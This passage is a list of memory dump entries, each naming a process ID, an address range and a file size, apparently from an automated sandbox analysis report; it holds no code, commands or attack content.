- memory/3728-116-0x0000000000030000-0x000000000003A000-memory.dmp (Filesize 40KB)
- memory/3904-126-0x0000000000000000-mapping.dmp
- memory/3948-158-0x0000000000000000-mapping.dmp
- memory/4008-429-0x0000000000000000-mapping.dmp
- memory/4008-449-0x0000000001890000-0x0000000001892000-memory.dmp (Filesize 8KB)
- memory/4024-581-0x0000000000402E1A-mapping.dmp
- memory/4068-134-0x0000000000000000-mapping.dmp
- memory/4068-150-0x0000000000400000-0x0000000000916000-memory.dmp (Filesize 5.1MB)
- memory/4204-275-0x000000000044003F-mapping.dmp
- memory/4204-274-0x0000000000400000-0x0000000000495000-memory.dmp (Filesize 596KB)
- memory/4204-283-0x0000000000400000-0x0000000000495000-memory.dmp (Filesize 596KB)
- memory/4208-219-0x0000000000000000-mapping.dmp
- memory/4208-222-0x0000000000660000-0x0000000000669000-memory.dmp (Filesize 36KB)
- memory/4208-220-0x0000000000670000-0x0000000000675000-memory.dmp (Filesize 20KB)
- memory/4376-292-0x0000000000000000-mapping.dmp
- memory/4408-230-0x0000000000F70000-0x0000000000F76000-memory.dmp (Filesize 24KB)
- memory/4408-224-0x0000000000000000-mapping.dmp
- memory/4408-231-0x0000000000F60000-0x0000000000F6C000-memory.dmp (Filesize 48KB)
- memory/4472-225-0x0000000000000000-mapping.dmp
- memory/4472-243-0x0000000000A70000-0x0000000000A76000-memory.dmp (Filesize 24KB)
- memory/4472-233-0x000000001B000000-0x000000001B002000-memory.dmp (Filesize 8KB)
- memory/4472-246-0x0000000000B70000-0x0000000000B75000-memory.dmp (Filesize 20KB)
- memory/4472-245-0x0000000000B50000-0x0000000000B55000-memory.dmp (Filesize 20KB)
- memory/4548-235-0x00000000032A0000-0x00000000032A9000-memory.dmp (Filesize 36KB)
- memory/4548-234-0x00000000032B0000-0x00000000032B4000-memory.dmp (Filesize 16KB)
- memory/4548-232-0x0000000000000000-mapping.dmp
- memory/4576-314-0x0000000006782000-0x0000000006783000-memory.dmp (Filesize 4KB)
- memory/4576-350-0x0000000006783000-0x0000000006784000-memory.dmp (Filesize 4KB)
- memory/4576-338-0x000000007F070000-0x000000007F071000-memory.dmp (Filesize 4KB)
- memory/4576-325-0x0000000008A20000-0x0000000008A53000-memory.dmp (Filesize 204KB)
- memory/4576-313-0x0000000006780000-0x0000000006781000-memory.dmp (Filesize 4KB)
- memory/4576-304-0x0000000000000000-mapping.dmp
- memory/4600-239-0x0000000000F50000-0x0000000000F55000-memory.dmp (Filesize 20KB)
- memory/4600-236-0x0000000000000000-mapping.dmp
- memory/4600-240-0x0000000000F40000-0x0000000000F49000-memory.dmp (Filesize 36KB)
- memory/4628-573-0x00000001402F327C-mapping.dmp
- memory/4628-575-0x0000000140000000-0x0000000140763000-memory.dmp (Filesize 7.4MB)
- memory/4672-241-0x0000000000000000-mapping.dmp
- memory/4672-244-0x0000000002F40000-0x0000000002F45000-memory.dmp (Filesize 20KB)
- memory/4672-247-0x0000000002F30000-0x0000000002F39000-memory.dmp (Filesize 36KB)
- memory/4748-571-0x0000000000000000-mapping.dmp
- memory/4888-289-0x0000000000000000-mapping.dmp
- memory/5096-454-0x0000000000000000-mapping.dmp